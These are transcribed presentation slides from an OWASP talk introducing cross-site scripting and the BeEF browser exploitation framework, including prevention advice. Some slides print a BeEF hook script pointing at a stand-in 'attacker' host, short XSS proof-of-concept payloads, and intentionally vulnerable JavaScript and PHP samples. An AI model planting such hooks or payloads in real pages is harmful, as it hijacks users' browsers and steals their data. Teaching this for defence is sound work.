Introduction to Cross-Site Scripting with BeEF Presented to OWASP San Antonio at Denim Group Created by: Charles Neill Modified Date: 2/5/2015
Download ReportTranscript Introduction to Cross-Site Scripting with BeEF Presented to OWASP San Antonio at Denim Group Created by: Charles Neill Modified Date: 2/5/2015
Introduction to Cross-Site
Scripting with BeEF
Presented to OWASP San Antonio at
Denim Group
Created by: Charles Neill
Modified Date: 2/5/2015
What is cross-site scripting?
• Cross-Site Scripting (referred to as XSS) is a type of web application attack
where malicious client-side script is injected into the application output and
subsequently executed by the user’s browser
• TL;DR: Not filtering out HTML and JavaScript in user input = bad
• It can be used to take over a user’s browser in a variety of ways
2
Why should I care about cross-site scripting?
• There was a time not too long ago when XSS was considered a low-risk type of
security issue, because when compared to a server-side exploit, it seemed
relatively benign
• As other issues like PHP remote file inclusions have become harder to exploit,
XSS attacks have increased in prominence and sophistication
Trick question: Which is worse, popping up an alert box or popping root on a
server?
3
Who’s affected by cross-site scripting?
Everyone. No, really – almost every site you can think of has had XSS problems
at one time or another (and probably still does)
Don’t believe me?
• Universal XSS in Internet Explorer (2015) [1]
• Tweetdeck (2014) [2]
• PayPal (2013) – BONUS: discovered by a 17 year old kid [3]
• Google Finance (2013) [4]
• 25 “Verasign-secured” online stores (2012) [5]
• McAfee (2011) [6]
• Visa (2010) [7]
4
Some sites you might recognize
http://www.xssed.com/files/image/News/paypalevsslxss.PNG
www.rackspace.com
5
Some sites you might recognize
Object Placeholder
http://3.bp.blogspot.com/-IpLMWEVPnRc/UmYV_19hnNI/AAAAAAAADfc/caJdmBEsyaE/s1600/1.png
www.rackspace.com
6
Some sites you might recognize
Object Placeholder
https://isc.sans.edu/diaryimages/youtube.png
7
Boooooring…
The classic proof-of-concept for XSS is a little alert box with some arbitrary text in
it, or a picture of something silly. This doesn’t seem nearly dangerous enough to
warrant concern.
What else you got?
8
Introducing: BeEF
What’s BeEF? From their website (beefproject.com):
“BeEF is short for The Browser Exploitation Framework… BeEF looks past the hardened
network perimeter and client system, and examines exploitability within the context of the
one open door: the web browser.”
9
Where’s the BeEF?
• That description sounds scary, but what does it mean?
• Think of BeEF as a one-stop-shop to gain and retain control over a user’s
browser, and do whatever you want with it
• This is like Metasploit (metasploit.com) for the browser
– You can even use Metasploit’s “browser_autopwn” tests to try to take over the browser
How does one use BeEF? This is all it takes to insert into a page:
<script src=http://attacker/hook.js></script>
www.rackspace.com
10
The BeEF Dashboard
• Monitor users by their IP, browser, OS
• See logs of their activity
• Trick the user into downloading malicious files
• Perform network reconnaissance
• And much more..
www.rackspace.com
11
DEMO TIME!
(Get excited)
www.rackspace.com
12
So many attacks, so little time
Basic Client-side Attacks
•Steal cookies
•Play a sound
•Get user-agent string
•See enabled plugins (e.g. Chrome PDF viewer, Java, etc.)
www.rackspace.com
14
More Advanced Client-Side Attacks
• Man-in-the-browser
• Forge user requests
• Get form values / HTML contents
• Fake notifications (Chrome plugin bar, LastPass login, etc.)
• Tabnabbing
www.rackspace.com
15
Lateral Movement / Network Exploration
•Port scanning
•Network mapping
•Execute local Redis commands
www.rackspace.com
16
So what should I do to prevent XSS?
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
www.rackspace.com
17
THANK YOU
RACKSPACE®
|
1 FANATICAL PLACE, CITY OF WINDCREST
US SALES: 1-800-961-2888
© RACKSPACE LTD.
|
|
US SUPPORT: 1-800-961-4454
|
SAN ANTONIO, TX 78218
|
WWW.RACKSPACE.COM
RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED S TATES AND OTHER COUNTRIES.
|
WWW.RACKSPACE.COM
So what should I do to prevent XSS? (No, really)
• Almost all client-side script injection comes down to the following characters:
<>(){}[]"';/\
• There are various ways to take care of these characters, but it is too contextdependent to give a one-size-fits-all answer
• The shortest answer is, make sure you’re only getting characters you expect
when a user enters any kind of information - make sure you never display a
user-entered string without properly encoding it
• Check out the links at the end of this presentation to learn more
www.rackspace.com
19
Examples of XSS in code
Here’s some sample vulnerable JavaScript. See if you can spot the bad part.
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a);
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
www.rackspace.com
20
Examples of XSS in code
Hmm, there’s the problem…
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a); // Too easy
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
www.rackspace.com
21
Examples of XSS in code
Now for something a little more interesting. Remember, you also have to
remember the third-party libraries you’re using.
Some innocent-looking jQuery code:
$(location.hash) // Wait, that’s it?
www.rackspace.com
22
Examples of XSS in code
But you’re not only securing the code you write, but all the code you used…
$(location.hash) // WHERE’S THE VULNERABLE PART?!
Well, if we’re using jQuery 1.6.1 and we visit the page
http://app/#<img src=/ onerror=alert(1)>
…this will pop up one of those alert boxes [8].
www.rackspace.com
23
Tips for filtering XSS
Here are some examples of how to filter HTML characters in a few simple
scenarios in PHP (there should be similar functions in any language; check the
links at the end of the PPT)
$int = intval($_GET['a']); // This will never return anything other than an integer
$str = htmlentities($_GET['b']); // This will encode any character for which there is
// an HTML entity equivalent (e.g. > < ")
// This is NOT always enough! [9]
www.rackspace.com
24
Getting around prevention measures
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
www.rackspace.com
25
Getting around prevention measures
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
What if we set $_GET['var'] to javascript:alert(/xss/);
www.rackspace.com
26
www.rackspace.com
27
QUESTIONS?
www.rackspace.com
28
Resources
• OWASP Links
– Guide to Cross-site Scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
– XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
– DOM based XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
www.rackspace.com
29
References
• [1] http://seclists.org/fulldisclosure/2015/Feb/0
• [2] http://techcrunch.com/2014/06/11/tweetdeck-fixes-xss-vulnerability/
• [3] http://threatpost.com/paypal-site-vulnerable-to-xss-attack
• [4] http://miki.it/blog/2013/7/30/xss-in-google-finance/
• [5] http://nakedsecurity.sophos.com/2012/02/28/verisign-xss-holes/
• [6] http://www.scmagazine.com/mcafee-working-to-fix-xss-information-disclosure-flaws/article/199505/
• [7] http://news.softpedia.com/news/XSS-Weakness-Found-on-Visa-USA-Website-157115.shtml
• [8] http://ma.la/jquery_xss/
• [9] http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references
www.rackspace.com
30
THANK YOU
RACKSPACE®
|
1 FANATICAL PLACE, CITY OF WINDCREST
US SALES: 1-800-961-2888
© RACKSPACE LTD.
|
|
US SUPPORT: 1-800-961-4454
|
SAN ANTONIO, TX 78218
|
WWW.RACKSPACE.COM
RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED S TATES AND OTHER COUNTRIES.
|
WWW.RACKSPACE.COM